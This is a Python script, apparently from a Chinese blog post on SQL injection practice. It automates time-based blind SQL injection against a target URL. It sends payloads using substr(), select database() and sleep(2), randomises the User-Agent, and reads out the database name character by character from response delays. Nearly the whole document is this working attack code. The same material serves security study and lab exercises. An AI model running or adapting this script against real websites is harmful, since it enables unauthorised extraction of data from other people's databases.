# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:22
@Auth : zhangxiang
@File :BlindInject_Str.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
#字符型盲注取数据库名
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
class BlindInject_Str(object):
def __init__(self):
pass
def StartInject_Str(self,code,StrList,url,Length):
for num in range(1, Length+1):
url = url
judgeStr = "%20and%20if(substr((select%20database()),changeNum,1)=%27replaceStr%27,sleep(2),1)%23"
submitStr = "&submit=0x5375626D6974%23"
pattern1 = r"changeNum"
replace1 = str(num)
FisWord = re.sub(pattern1, replace1, judgeStr)
for x in code:
Str = x
word = FisWord + submitStr
# 正则
pattern2 = r"replaceStr"
replace2 = Str
SeWord = re.sub(pattern2, replace2, word)
full_url = url + SeWord
# print(full_url)
# 2.发请求保存到本地
headers = {'User-Agent':random.choice(ua_list)}
startTime = time.time()
req = request.Request(url=full_url, headers=headers)
res = request.urlopen(req)
endTime = time.time()
allTime = endTime - startTime
# print(allTime)
if (allTime > 2):
print("*" * 200)
StrList.append(x)
print("得到盲注结果:" + str(StrList))
print("注入的payload:" + full_url)
print("使用的时间:" + str(allTime))
print("*" * 200)
else:
pass
return StrList
SQL注入代码实践(盲注-获取数据库名长度【字符型】)
于 2022-08-20 18:44:23 首次发布